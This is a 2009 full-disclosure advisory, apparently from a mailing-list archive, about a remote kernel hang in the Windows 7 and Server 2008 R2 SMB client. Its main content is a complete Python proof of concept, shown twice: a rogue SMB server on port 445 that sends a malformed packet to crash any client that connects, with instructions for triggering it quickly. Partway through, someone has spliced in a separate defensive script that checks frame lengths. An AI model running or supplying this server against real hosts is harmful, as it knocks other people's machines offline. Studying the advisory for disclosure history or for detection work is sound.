Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: this issue is a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. It causes a remote kernel crash. The Metasploit Framework contains a module for this vulnerability.
#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and Server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
# infinite loop.
# NO BSOD, YOU MUST PULL THE PLUG.
# To trigger it quickly: \\this_script_ip_addr\BLAH, crashes instantly
# Author: Laurent Gaffié
import SocketServer

packet = ("\x00\x00\x00\x9a"  # ---> length should be 9e, not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")

class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445
launch.serve_forever()
This bug is real evidence that the SDL FAILS.
The bug triggers an infinite loop on SMB{1,2}, pre-authentication, no credentials required …
It can be triggered on the local network via (IE*).
The bug is so simple that it should have been spotted 2 years ago by the SDL, if the SDL had ever existed:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))) + SMB_packet
(The NetBIOS header gives the length of the SMB{1,2} packet.)
If netbios_header is 4 bytes smaller or larger than SMB_packet, it simply blows up!
WHAT ?? Are you kidding me, where is my SDL?!?
"The safest operating system";
Regardless of how your firewall is configured, it can be triggered via IE, or even with an NBNS broadcast method (no user interaction).
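The length check described above, seen from the receiving side, as an added example that is not part of the original advisory: it walks the frames in a captured TCP/445 byte stream and reports where the 4-byte header's declared length disagrees with the bytes that follow. The function names and the sample frames are constructed for illustration.

```python
import struct

SMB_MAGICS = (b"\xffSMB", b"\xfeSMB")  # SMB1 / SMB2 protocol identifiers


def scan_stream(captured: bytes) -> list:
    """Walk the session frames in one direction of a closed TCP/445 stream.

    Returns (offset, finding) tuples; an empty list means every 4-byte
    header's declared length matched the bytes that followed it.
    """
    findings, offset = [], 0
    while offset < len(captured):
        header = captured[offset:offset + 4]
        if len(header) < 4:
            findings.append((offset, "truncated-header"))
            break
        # Direct-hosted SMB: one zero byte, then a 3-byte big-endian length.
        word, = struct.unpack(">I", header)
        msg_type, declared = word >> 24, word & 0xFFFFFF
        body = captured[offset + 4:offset + 4 + declared]
        if msg_type != 0 or body[:4] not in SMB_MAGICS:
            # At offset 0 the stream is not SMB; later on, the most likely
            # cause is a previous header that declared too few bytes.
            kind = "not-smb" if offset == 0 else "previous-frame-under-declared"
            findings.append((offset, kind))
            break
        if len(body) < declared:
            findings.append((offset, "declared-longer-than-payload"))
            break
        offset += 4 + declared
    return findings


def frame(body: bytes, declared: int) -> bytes:
    """Constructed test helper: prefix body with an arbitrary declared length."""
    return struct.pack(">I", declared & 0xFFFFFF) + body


# Constructed sample body (SMB2 magic plus zero padding), not captured traffic.
BODY = b"\xfeSMB" + b"\x00" * 60
SAMPLES = {
    "consistent": frame(BODY, 64) + frame(BODY, 64),
    "under_by_4": frame(BODY, 60),
    "over_by_4": frame(BODY, 68),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, scan_stream(data))
```

The check only makes sense on a stream that has ended: on a live connection, a header that declares more bytes than have arrived so far may simply be waiting for the rest.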
================================================
– Release date: November 11, 2009
– Discovered by: Laurent Gaffié
– Severity: medium / high
==============================================
IV. PROOF OF CONCEPT
————————–
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and Server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
# infinite loop.
# NO BSOD, YOU MUST PULL THE PLUG.
# To trigger it quickly: \\this_script_ip_addr\BLAH, crashes instantly
# Author: Laurent Gaffié
#
packet = ("\x00\x00\x00\x9a"  # ---> length should be 9e, not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
V. BUSINESS IMPACT
————————–
An attacker can remotely crash any Windows 7 / Server 2008R2 host
on the local network or via IE
VII. SOLUTION
————————–
No patch is available at this time; your vendor doesn't care.
Close the SMB feature and ports until a valid audit is provided.
X. HISTORY OF CHANGES
————————–
November 8, 2009: MSRC contacted
November 8, 2009: MSRC Discovered Vulnerability
November 11, 2009: MSRC is trying to convince me because there is an IPv6 bug from various vendors that should not appear in security bulletins.
November 11, 2009: This valuable bug has been released.
XI. NOTES
————————–
The legal information contained in this notice is provided “as is”
without representations or guarantees of expediency or otherwise.
I do not accept responsibility for any damage caused by the use or
misuse of this information.
Full Disclosure Mailing List Archives
Remote kernel failure Windows 7 Server 2008R2
